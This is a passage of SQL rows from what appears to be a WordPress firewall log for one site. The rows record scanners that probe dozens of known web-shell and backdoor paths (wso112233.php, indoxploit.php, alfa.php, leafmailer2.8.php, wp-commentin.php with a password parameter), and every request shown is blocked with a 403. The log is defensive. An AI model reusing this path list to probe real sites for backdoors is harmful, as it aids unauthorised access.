Safari\\/537.36\"}','h3DkZ2KMNb9UBzjaPgcw1i54',0,1673888049.6452,118,'','GET',403,0,700,0,1,'',0),('173.234.158.82',2917834322,'','https://www.equalitywalk.org.uk/indoxploit.php','','{\"1\":\"Mozilla\\/5.0 (Macintosh; U; Intel Mac OS X 10_6_8; en-us) AppleWebKit\\/534.50 (KHTML, like Gecko) Version\\/5.1 Safari\\/534.50\"}','qXSyuHkn5wOVQzj28rfT97pN',0,1673888984.8175,105,'','GET',403,0,700,0,1,'',0),('173.234.158.82',2917834322,'','https://www.equalitywalk.org.uk/wp-class.php','','{\"1\":\"Mozilla\\/5.0 (Macintosh; U; Intel Mac OS X 10_6_8; en-us) AppleWebKit\\/534.50 (KHTML, like Gecko) Version\\/5.1 Safari\\/534.50\"}','3VcTJWpFQymoCNSK2fbLEzlq',0,1673888988.7913,100,'','GET',403,0,700,0,1,'',0),('173.234.158.82',2917834322,'','https://www.equalitywalk.org.uk/wordpress/wp-class.php','','{\"1\":\"Mozilla\\/5.0 (Macintosh; U; Intel Mac OS X 10_6_8; en-us) AppleWebKit\\/534.50 (KHTML, like Gecko) Version\\/5.1 Safari\\/534.50\"}','Je8AnPGC4uTtzMiBlo9N3Khm',0,1673888994.8591,129,'','GET',403,0,700,0,1,'',0),('45.248.151.22',771266326,'','https://www.equalitywalk.org.uk/wp-commentin.php?pass=f0aab4595a024d626315fb786dce8282','','{\"1\":\"Go-http-client\\/1.1\",\"2\":\"http:\\/\\/www.equalitywalk.org.uk\\/wp-commentin.php?pass=f0aab4595a024d626315fb786dce8282\"}','gIL96kAWUNGbPhxm0jlrws1B',0,1673894034.1181,376,'','GET',403,0,700,0,1,'',0),('45.248.151.22',771266326,'','https://www.equalitywalk.org.uk/wp/wp-commentin.php?pass=f0aab4595a024d626315fb786dce8282','','{\"1\":\"Go-http-client\\/1.1\",\"2\":\"http:\\/\\/www.equalitywalk.org.uk\\/wp\\/wp-commentin.php?pass=f0aab4595a024d626315fb786dce8282\"}','TzDwnjWP6i2AFMHl0cRsfbdt',0,1673894035.1760,162,'','GET',403,0,700,0,1,'',0),('45.248.151.22',771266326,'','https://www.equalitywalk.org.uk/wordpress/wp-commentin.php?pass=f0aab4595a024d626315fb786dce8282','','{\"1\":\"Go-http-client\\/1.1\",\"2\":\"http:\\/\\/www.equalitywalk.org.uk\\/wordpress\\/wp-commentin.php?pass=f0aab4595a024d626315fb786dce8282\"}','nkN8pz64fEBDSc2yPZ9GeLrj',0,1673894036.2688,240,'','GET',403,0,700,0,1,'',0),('45.248.151.22',771266326,'','https://www.equalitywalk.org.uk/blog/wp-commentin.php?pass=f0aab4595a024d626315fb786dce8282','','{\"1\":\"Go-http-client\\/1.1\",\"2\":\"http:\\/\\/www.equalitywalk.org.uk\\/blog\\/wp-commentin.php?pass=f0aab4595a024d626315fb786dce8282\"}','Jm3zLxOTiqUa0gHeK4ECI58b',0,1673894037.2027,262,'','GET',403,0,700,0,1,'',0),('45.248.151.22',771266326,'','https://www.equalitywalk.org.uk/site/wp-commentin.php?pass=f0aab4595a024d626315fb786dce8282','','{\"1\":\"Go-http-client\\/1.1\",\"2\":\"http:\\/\\/www.equalitywalk.org.uk\\/site\\/wp-commentin.php?pass=f0aab4595a024d626315fb786dce8282\"}','HbajpiQxszCV9FnmZ7XUtKfA',0,1673894038.3461,172,'','GET',403,0,700,0,1,'',0),('4.233.59.82',82393938,'','https://www.equalitywalk.org.uk/.sts.php','','{\"1\":\"python-requests\\/2.28.1\"}','WgNIt8PdR39jO6FbY7fayvMl',0,1673894995.1448,177,'','GET',403,0,700,0,1,'',0),('4.233.59.82',82393938,'','https://www.equalitywalk.org.uk/.Wp-back.phP','','{\"1\":\"python-requests\\/2.28.1\"}','plFxUvoWsj8eZ4gE5mzuQfAY',0,1673895102.3971,125,'','GET',403,0,700,0,1,'',0),('4.233.59.82',82393938,'','https://www.equalitywalk.org.uk/fx.php','','{\"1\":\"python-requests\\/2.28.1\"}','l2L58urH7KNkzDTjMFcZStB3',0,1673895196.2210,106,'','GET',403,0,700,0,1,'',0),('4.233.59.82',82393938,'','https://www.equalitywalk.org.uk/.ae.php','','{\"1\":\"python-requests\\/2.28.1\"}','IGSu4Ovjx1EkdnU9hTKVm6Zz',0,1673895261.5356,107,'','GET',403,0,700,0,1,'',0),('4.233.59.82',82393938,'','https://www.equalitywalk.org.uk/wp_content/wp-1ogin_bak.php','','{\"1\":\"python-requests\\/2.28.1\"}','xtmCcb1a6jLJEHudzUKrAoGS',0,1673895351.6728,133,'','GET',403,0,700,0,1,'',0),('4.233.59.82',82393938,'','https://www.equalitywalk.org.uk/wso112233.php','','{\"1\":\"python-requests\\/2.28.1\"}','VfAoCpOkSdDuyaIEnMmKYtgP',0,1673895457.7680,154,'','GET',403,0,700,0,1,'',0),('4.233.59.82',82393938,'','https://www.equalitywalk.org.uk/bala.php','','{\"1\":\"python-requests\\/2.28.1\"}','xXROJtHSrEK0ngle9kFyUB7z',0,1673895543.6552,116,'','GET',403,0,700,0,1,'',0),('4.233.59.82',82393938,'','https://www.equalitywalk.org.uk/xleet.php','','{\"1\":\"python-requests\\/2.28.1\"}','fLRScXnYtkGOMa8iPBq2uj6Z',0,1673895569.3023,110,'','GET',403,0,700,0,1,'',0),('4.233.59.82',82393938,'','https://www.equalitywalk.org.uk/xleet.php','','{\"1\":\"python-requests\\/2.28.1\"}','kDlXT6mcPd9iqBxb4MCLyWeQ',0,1673895593.3909,138,'','GET',403,0,700,0,1,'',0),('4.233.59.82',82393938,'','https://www.equalitywalk.org.uk/wp-class.php','','{\"1\":\"python-requests\\/2.28.1\"}','TiIaoVKFEOsDCP5yzNHmRLvA',0,1673895685.2597,163,'','GET',403,0,700,0,1,'',0),('4.233.59.82',82393938,'','https://www.equalitywalk.org.uk/x.php','','{\"1\":\"python-requests\\/2.28.1\"}','OKn4z0MSgX2kxNDjLF9wa1qC',0,1673895770.1547,126,'','GET',403,0,700,0,1,'',0),('4.233.59.82',82393938,'','https://www.equalitywalk.org.uk/0z.php','','{\"1\":\"python-requests\\/2.28.1\"}','iAfVIRh0LMsKgQBEkJXt7Y9u',0,1673895846.0836,120,'','GET',403,0,700,0,1,'',0),('4.233.59.82',82393938,'','https://www.equalitywalk.org.uk/m.php','','{\"1\":\"python-requests\\/2.28.1\"}','9H1vcp06TtqAFfWSR8ZseCNw',0,1673895887.2048,103,'','GET',403,0,700,0,1,'',0),('4.233.59.82',82393938,'','https://www.equalitywalk.org.uk/a.php','','{\"1\":\"python-requests\\/2.28.1\"}','0TwhGsEmjKLSZganJVPd31xr',0,1673895959.8150,118,'','GET',403,0,700,0,1,'',0),('4.233.59.82',82393938,'','https://www.equalitywalk.org.uk/b.php','','{\"1\":\"python-requests\\/2.28.1\"}','NXO3IoV7ELfl0Trh8UMCpKcZ',0,1673896099.7406,118,'','GET',403,0,700,0,1,'',0),('4.233.59.82',82393938,'','https://www.equalitywalk.org.uk/c.php','','{\"1\":\"python-requests\\/2.28.1\"}','DlKtZYgucBfVy7SUT8FdEao3',0,1673896149.8881,387,'','GET',403,0,700,0,1,'',0),('4.233.59.82',82393938,'','https://www.equalitywalk.org.uk/wp.php','','{\"1\":\"python-requests\\/2.28.1\"}','cyOpfUsrmQdLTY8Wg6v14zo7',0,1673896188.0414,129,'','GET',403,0,700,0,1,'',0),('4.233.59.82',82393938,'','https://www.equalitywalk.org.uk/mar.php','','{\"1\":\"python-requests\\/2.28.1\"}','bjzWlrONUcT0iSFoKkVnI8ew',0,1673896255.5892,107,'','GET',403,0,700,0,1,'',0),('4.233.59.82',82393938,'','https://www.equalitywalk.org.uk/p.php','','{\"1\":\"python-requests\\/2.28.1\"}','ASfQBeLuvxgOMRNJY7is2W6E',0,1673896309.1054,297,'','GET',403,0,700,0,1,'',0),('4.233.59.82',82393938,'','https://www.equalitywalk.org.uk/t.php','','{\"1\":\"python-requests\\/2.28.1\"}','xkQ0MWGhjTBL3U46qoRleYOz',0,1673896423.7388,224,'','GET',403,0,700,0,1,'',0),('37.230.116.109',635860077,'','https://www.equalitywalk.org.uk/wp-includes/versions.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; WOW64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/84.0.4147.125 Safari\\/537.36\"}','0QCGmezrV2BExSd46kP5RMqI',0,1673896436.7001,100,'','POST',403,0,700,0,1,'',0),('37.230.116.109',635860077,'','https://www.equalitywalk.org.uk/wp-admin/assets/load.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; WOW64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/84.0.4147.125 Safari\\/537.36\"}','m1tbHBIlUsvuzQpJPrAgSYOK',0,1673896437.0593,93,'','GET',403,0,700,0,1,'',0),('37.230.116.109',635860077,'','https://www.equalitywalk.org.uk/wp-includes/fonts/load.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; WOW64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/84.0.4147.125 Safari\\/537.36\"}','GTrjbsmRg2WkdAKo9qOiBCef',0,1673896438.0718,93,'','GET',403,0,700,0,1,'',0),('37.230.116.109',635860077,'','https://www.equalitywalk.org.uk/wp-includes/js/thickbox/themes.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; WOW64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/84.0.4147.125 Safari\\/537.36\"}','claMd6GTxSs9WyAjFI73KozC',0,1673896438.5775,100,'','GET',403,0,700,0,1,'',0),('4.233.59.82',82393938,'','https://www.equalitywalk.org.uk/o.php','','{\"1\":\"python-requests\\/2.28.1\"}','OTGlN0ZHyWc28oUtQzwasJMk',0,1673896558.2144,112,'','GET',403,0,700,0,1,'',0),('4.233.59.82',82393938,'','https://www.equalitywalk.org.uk/w.php','','{\"1\":\"python-requests\\/2.28.1\"}','EFYONxIgu91mZrjJvhQteW3b',0,1673896648.1111,115,'','GET',403,0,700,0,1,'',0),('20.51.247.40',338949928,'','https://equalitywalk.org.uk/a.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/85.0.4183.102 Safari\\/537.36\"}','bTUqBdQ8pwx5kJMi9IoLfR1H',0,1673897933.7162,144,'','GET',403,0,700,0,1,'',0),('20.51.247.40',338949928,'','https://equalitywalk.org.uk/z.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/85.0.4183.102 Safari\\/537.36\"}','XgGSPyFpfOQV96BirZJwIqna',0,1673897952.7529,107,'','GET',403,0,700,0,1,'',0),('20.51.247.40',338949928,'','https://equalitywalk.org.uk/e.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/85.0.4183.102 Safari\\/537.36\"}','3IG8AcDegmSnNrQkCuKY75BV',0,1673897953.2487,94,'','GET',403,0,700,0,1,'',0),('20.51.247.40',338949928,'','https://equalitywalk.org.uk/r.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/85.0.4183.102 Safari\\/537.36\"}','YVw1WzXT6R2GLxJEKnhIdiqB',0,1673897953.6624,130,'','GET',403,0,700,0,1,'',0),('20.51.247.40',338949928,'','https://equalitywalk.org.uk/t.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/85.0.4183.102 Safari\\/537.36\"}','SoH0u5YGhyWfqxzFCvrIApM3',0,1673897954.0466,99,'','GET',403,0,700,0,1,'',0),('20.51.247.40',338949928,'','https://equalitywalk.org.uk/y.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/85.0.4183.102 Safari\\/537.36\"}','Q7mleYcNhVLE1Xnvjyq2IaPO',0,1673897954.4483,85,'','GET',403,0,700,0,1,'',0),('20.51.247.40',338949928,'','https://equalitywalk.org.uk/u.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/85.0.4183.102 Safari\\/537.36\"}','Hhf5rQ7uUalVX29eW6p0RyoZ',0,1673897954.8718,96,'','GET',403,0,700,0,1,'',0),('20.51.247.40',338949928,'','https://equalitywalk.org.uk/i.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/85.0.4183.102 Safari\\/537.36\"}','Gfl5Y82xbWAOptmRUdEwgj61',0,1673897955.1742,85,'','GET',403,0,700,0,1,'',0),('20.51.247.40',338949928,'','https://equalitywalk.org.uk/o.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/85.0.4183.102 Safari\\/537.36\"}','HQ1VAfLchYUuWi6CEw9FspIm',0,1673897955.4977,117,'','GET',403,0,700,0,1,'',0),('20.51.247.40',338949928,'','https://equalitywalk.org.uk/p.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/85.0.4183.102 Safari\\/537.36\"}','docBGEsN3Y9MSCFA6vmuZ0Hb',0,1673897955.8564,156,'','GET',403,0,700,0,1,'',0),('20.51.247.40',338949928,'','https://equalitywalk.org.uk/q.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/85.0.4183.102 Safari\\/537.36\"}','i9HOAuQ5nbysv6N10SoI8K7M',0,1673897956.3328,125,'','GET',403,0,700,0,1,'',0),('20.51.247.40',338949928,'','https://equalitywalk.org.uk/s.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/85.0.4183.102 Safari\\/537.36\"}','mTrIzhUeVu7QdLF28liGH4X0',0,1673897956.7330,106,'','GET',403,0,700,0,1,'',0),('20.51.247.40',338949928,'','https://equalitywalk.org.uk/d.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/85.0.4183.102 Safari\\/537.36\"}','i5FMx7jJzeabfZS2pu6RnEmD',0,1673897957.2120,95,'','GET',403,0,700,0,1,'',0),('20.51.247.40',338949928,'','https://equalitywalk.org.uk/f.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/85.0.4183.102 Safari\\/537.36\"}','Mzc0sPT8dBmthXOg6nEfe3kI',0,1673897957.7148,114,'','GET',403,0,700,0,1,'',0),('20.51.247.40',338949928,'','https://equalitywalk.org.uk/g.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/85.0.4183.102 Safari\\/537.36\"}','c9Hd7uKpPAiNIX0s8h3jrqJE',0,1673897958.0341,105,'','GET',403,0,700,0,1,'',0),('20.51.247.40',338949928,'','https://equalitywalk.org.uk/h.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/85.0.4183.102 Safari\\/537.36\"}','dCQ2il4zYTcmjKEI0fAa5oDZ',0,1673897958.3643,94,'','GET',403,0,700,0,1,'',0),('20.51.247.40',338949928,'','https://equalitywalk.org.uk/j.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/85.0.4183.102 Safari\\/537.36\"}','WS0HdpwRPmuK4caT8l7rexLA',0,1673897958.7415,93,'','GET',403,0,700,0,1,'',0),('20.51.247.40',338949928,'','https://equalitywalk.org.uk/k.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/85.0.4183.102 Safari\\/537.36\"}','QXbtPDRGF35vmhzsTlo286a0',0,1673897959.1258,93,'','GET',403,0,700,0,1,'',0),('20.51.247.40',338949928,'','https://equalitywalk.org.uk/l.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/85.0.4183.102 Safari\\/537.36\"}','rgZVJ4ipNKytjCAoGB3PlekE',0,1673897959.5373,94,'','GET',403,0,700,0,1,'',0),('20.51.247.40',338949928,'','https://equalitywalk.org.uk/m.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/85.0.4183.102 Safari\\/537.36\"}','yKvhXr2S8n1HElpw6zF35G9b',0,1673897959.8480,126,'','GET',403,0,700,0,1,'',0),('20.51.247.40',338949928,'','https://equalitywalk.org.uk/w.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/85.0.4183.102 Safari\\/537.36\"}','6QMET1wi0VFGvcJUqpzSnOaZ',0,1673897960.2517,99,'','GET',403,0,700,0,1,'',0),('20.51.247.40',338949928,'','https://equalitywalk.org.uk/x.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/85.0.4183.102 Safari\\/537.36\"}','8Bafhts0nGEo5HMvR6CjSQcm',0,1673897960.6953,99,'','GET',403,0,700,0,1,'',0),('20.51.247.40',338949928,'','https://equalitywalk.org.uk/c.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/85.0.4183.102 Safari\\/537.36\"}','YPXGx1V8vqRZNTMJEbkKrs3B',0,1673897961.1177,94,'','GET',403,0,700,0,1,'',0),('20.51.247.40',338949928,'','https://equalitywalk.org.uk/v.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/85.0.4183.102 Safari\\/537.36\"}','g9JKEUHTwlnk7DGFoXBMNqZ2',0,1673897961.5150,130,'','GET',403,0,700,0,1,'',0),('20.51.247.40',338949928,'','https://equalitywalk.org.uk/b.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/85.0.4183.102 Safari\\/537.36\"}','paCtObUDVNB8H94JkKyx6Fvu',0,1673897962.0566,94,'','GET',403,0,700,0,1,'',0),('20.51.247.40',338949928,'','https://equalitywalk.org.uk/n.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/85.0.4183.102 Safari\\/537.36\"}','uqOk6TQ34Frg1tRX2VKP7MCz',0,1673897962.5218,94,'','GET',403,0,700,0,1,'',0),('20.51.247.40',338949928,'','https://equalitywalk.org.uk/new-index.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/85.0.4183.102 Safari\\/537.36\"}','fLUtJ8iKTGOhupzY3a7VRI1W',0,1673897963.0422,125,'','GET',403,0,700,0,1,'',0),('20.51.247.40',338949928,'','https://equalitywalk.org.uk/old-index.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/85.0.4183.102 Safari\\/537.36\"}','6nR5seZfa4OLkviDCQAhWruV',0,1673897963.5011,110,'','GET',403,0,700,0,1,'',0),('20.51.247.40',338949928,'','https://equalitywalk.org.uk/Sendemail.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/85.0.4183.102 Safari\\/537.36\"}','N6QKGpWlkVOFnPzuqDJ1yHZg',0,1673897963.9582,159,'','GET',403,0,700,0,1,'',0),('20.51.247.40',338949928,'','https://equalitywalk.org.uk/shell.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/85.0.4183.102 Safari\\/537.36\"}','3UYV0WIB2r51sXFP4bxoDvQj',0,1673897964.3392,99,'','GET',403,0,700,0,1,'',0),('20.51.247.40',338949928,'','https://equalitywalk.org.uk/3index.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/85.0.4183.102 Safari\\/537.36\"}','UMjaS1TWX6793VDtObEvYFN4',0,1673897964.7008,130,'','GET',403,0,700,0,1,'',0),('20.51.247.40',338949928,'','https://equalitywalk.org.uk/2index.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/85.0.4183.102 Safari\\/537.36\"}','5N3IJKZ1D0L8SsX6bUnTehWx',0,1673897965.0927,98,'','GET',403,0,700,0,1,'',0),('20.51.247.40',338949928,'','https://equalitywalk.org.uk/kindex.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/85.0.4183.102 Safari\\/537.36\"}','ykw3hRbsaVe4J52CMATDPEQr',0,1673897965.4912,134,'','GET',403,0,700,0,1,'',0),('20.51.247.40',338949928,'','https://equalitywalk.org.uk/cpanel.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/85.0.4183.102 Safari\\/537.36\"}','cOi3TP8o9sUxSVHRWM5rBazd',0,1673897965.9140,104,'','GET',403,0,700,0,1,'',0),('20.51.247.40',338949928,'','https://equalitywalk.org.uk/cp.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/85.0.4183.102 Safari\\/537.36\"}','ahnKvXFsgbDIO8VquYEN2mxt',0,1673897966.2636,96,'','GET',403,0,700,0,1,'',0),('20.51.247.40',338949928,'','https://equalitywalk.org.uk/mar.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/85.0.4183.102 Safari\\/537.36\"}','on4jQZPdtuI0zfi9b3YlEgAF',0,1673897966.5746,93,'','GET',403,0,700,0,1,'',0),('20.51.247.40',338949928,'','https://equalitywalk.org.uk/sym403.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/85.0.4183.102 Safari\\/537.36\"}','oEQsxXZC57BDaL14wWHfYUcy',0,1673897967.0416,92,'','GET',403,0,700,0,1,'',0),('20.51.247.40',338949928,'','https://equalitywalk.org.uk/content.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/85.0.4183.102 Safari\\/537.36\"}','2tjXnMfvTBOlQ08mP69Dpiox',0,1673897967.4101,114,'','GET',403,0,700,0,1,'',0),('20.51.247.40',338949928,'','https://equalitywalk.org.uk/1index.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/85.0.4183.102 Safari\\/537.36\"}','DryO0jF7oEc3q2LaftNZMzPQ',0,1673897967.8667,118,'','GET',403,0,700,0,1,'',0),('20.51.247.40',338949928,'','https://equalitywalk.org.uk/wikindex.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/85.0.4183.102 Safari\\/537.36\"}','LKr2MR1BIP3lHDXifw5Gsyct',0,1673897968.2707,110,'','GET',403,0,700,0,1,'',0),('20.51.247.40',338949928,'','https://equalitywalk.org.uk/FoxWSOv1.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/85.0.4183.102 Safari\\/537.36\"}','73xl1NvJn8kF0ejGCLzdsuh4',0,1673897968.6892,121,'','GET',403,0,700,0,1,'',0),('20.51.247.40',338949928,'','https://equalitywalk.org.uk/alfa.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/85.0.4183.102 Safari\\/537.36\"}','Za6VEWm047IsCnohutTKPBze',0,1673897969.0022,99,'','GET',403,0,700,0,1,'',0),('20.51.247.40',338949928,'','https://equalitywalk.org.uk/alf.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/85.0.4183.102 Safari\\/537.36\"}','v0EzYnAlbtceC49s8Ha5RVK1',0,1673897969.3902,103,'','GET',403,0,700,0,1,'',0),('20.51.247.40',338949928,'','https://equalitywalk.org.uk/ws.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/85.0.4183.102 Safari\\/537.36\"}','N701oi2jyfHqrF8GuckhnRYA',0,1673897969.7516,124,'','GET',403,0,700,0,1,'',0),('20.51.247.40',338949928,'','https://equalitywalk.org.uk/1.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/85.0.4183.102 Safari\\/537.36\"}','UTchae67lrW9yZwzbp3vEqXF',0,1673897970.2648,92,'','GET',403,0,700,0,1,'',0),('20.51.247.40',338949928,'','https://equalitywalk.org.uk/2.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/85.0.4183.102 Safari\\/537.36\"}','azbiTYLjgBI26f4XyQJu5C87',0,1673897970.6324,111,'','GET',403,0,700,0,1,'',0),('20.51.247.40',338949928,'','https://equalitywalk.org.uk/3.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/85.0.4183.102 Safari\\/537.36\"}','gkGYK3P5QxpCSDj0cNOU2q81',0,1673897970.9689,101,'','GET',403,0,700,0,1,'',0),('20.51.247.40',338949928,'','https://equalitywalk.org.uk/leaf.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/85.0.4183.102 Safari\\/537.36\"}','m0pKf5SPciCnorLFOeAwa3DM',0,1673897971.4748,94,'','GET',403,0,700,0,1,'',0),('20.51.247.40',338949928,'','https://equalitywalk.org.uk/bb.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/85.0.4183.102 Safari\\/537.36\"}','3rhMg9IeZzQEC6t8FqJjuBGK',0,1673897971.8473,107,'','GET',403,0,700,0,1,'',0),('20.51.247.40',338949928,'','https://equalitywalk.org.uk/leafmailer2.8.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/85.0.4183.102 Safari\\/537.36\"}','Pl0GFyX3WZ96UR14qrYTdSEc',0,1673897972.3100,94,'','GET',403,0,700,0,1,'',0),('20.51.247.40',338949928,'','https://equalitywalk.org.uk/mailer.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/85.0.4183.102 Safari\\/537.36\"}','xcVNLadofCu03wimQZEb71zK',0,1673897972.7562,204,'','GET',403,0,700,0,1,'',0),('20.51.247.40',338949928,'','https://equalitywalk.org.uk/alex.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/85.0.4183.102 Safari\\/537.36\"}','RKjS1kvmACB7TtWJzZDq35pE',0,1673897973.3251,135,'','GET',403,0,700,0,1,'',0),('20.51.247.40',338949928,'','https://equalitywalk.org.uk/lf.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/85.0.4183.102 Safari\\/537.36\"}','BnWsm7X9kbZGYdyFfzrphgDl',0,1673897973.8209,99,'','GET',403,0,700,0,1,'',0),('20.51.247.40',338949928,'','https://equalitywalk.org.uk/xox.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/85.0.4183.102 Safari\\/537.36\"}','mjCtSPEZKA2QGphz0oIgTJNr',0,1673897974.2812,97,'','GET',403,0,700,0,1,'',0),('20.51.247.40',338949928,'','https://equalitywalk.org.uk/xo.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) 